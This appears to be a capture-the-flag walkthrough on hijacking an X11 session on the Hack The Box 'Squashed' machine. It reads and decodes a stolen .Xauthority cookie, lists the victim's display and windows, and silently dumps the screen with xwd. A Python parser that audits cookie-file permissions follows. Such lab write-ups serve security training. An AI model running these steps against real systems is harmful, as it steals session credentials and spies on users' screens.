Screenshot capturing
Pentesting X11: The X Window System (X) is a versatile windowing system present on UNIX-based operating systems.
X11
X is a portable, network window system for managing windowed GUIs. When paired with a display manager, it serves as the GUI for running programs that need one to function properly.
This vulnerability can be found in: https://app.hackthebox.com/machines/Squashed
Reading the .Xauthority cookie
# Read file
$ cat /mnt/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCSegJckVyw7fOCjfGE9Aap
# Decode and save in /tmp
echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCSegJckVyw7fOCjfGE9Aap | base64 -d > /tmp/.Xauthority
Setting the cookie
# Set
export XAUTHORITY=/tmp/.Xauthority
Using this cookie, we now have access to a user's session. We can use w to find out which display is used by the user.
alex@squashed:/tmp$ w
16:14:13 up 4:02, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 12:12 4:02m 16.33s 0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome
Using the cookie
# Find more
xdpyinfo -display :0
With xwininfo we find active windows.
xwininfo -root -tree -display :0

It shows :0 is the display used. Using the xwd (X Window Dump) command, we dump the image of a window.
# Dump image
xwd -root -screen -silent -display :0 > /tmp/screen.xwd
-root Main root window.
-screen Send GetImage request to root window
-silent No output messages or sounds
-display Display used
The screenshot
# Convert the screenshot to png
convert screen.xwd screen.png
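The base64 blob in the "Reading the .Xauthority cookie" step decodes to a single xauth record. The parser below is an added example, not part of the original page, and its function names are this example's own. It shows what the file holds (the display it is valid for and a MIT-MAGIC-COOKIE-1 key stored in clear, which is why read access to the file is enough to join the session) and flags a file mode that lets other accounts read it.

```python
import base64
import stat
import struct

# Base64 of the .Xauthority file, copied from the "Read file" step on this page.
PAGE_BLOB = ("AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0x"
             "ABCSegJckVyw7fOCjfGE9Aap")
# Address family codes (X.h / Xauth.h).
FAMILIES = {0: "Internet", 6: "Internet6", 256: "Local", 65535: "Wild"}

def _take(raw, pos):
    """Read one length-prefixed field: 2-byte big-endian length, then the bytes."""
    if pos + 2 > len(raw):
        raise ValueError("truncated length prefix")
    (length,) = struct.unpack_from(">H", raw, pos)
    end = pos + 2 + length
    if end > len(raw):
        raise ValueError("field runs past end of file")
    return raw[pos + 2:end], end

def parse_xauthority(raw):
    """Parse raw .Xauthority bytes into a list of records (one per display)."""
    records, pos = [], 0
    while pos < len(raw):
        if pos + 2 > len(raw):
            raise ValueError("truncated family field")
        (family,) = struct.unpack_from(">H", raw, pos)
        pos += 2
        address, pos = _take(raw, pos)
        number, pos = _take(raw, pos)
        name, pos = _take(raw, pos)
        data, pos = _take(raw, pos)
        records.append({
            "family": FAMILIES.get(family, hex(family)),
            "host": address.decode("latin-1"),
            "display": ":" + number.decode("ascii"),
            "auth": name.decode("ascii"),
            "key_bits": len(data) * 8,  # report the key size only, not the secret
        })
    return records

def mode_exposes_cookie(mode):
    """True if group or other can read the file; it is expected to be 0600."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))

if __name__ == "__main__":
    for rec in parse_xauthority(base64.b64decode(PAGE_BLOB)):
        print(rec)
```

To audit a live system, pass `os.stat(path).st_mode` for each user's .Xauthority to `mode_exposes_cookie`.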
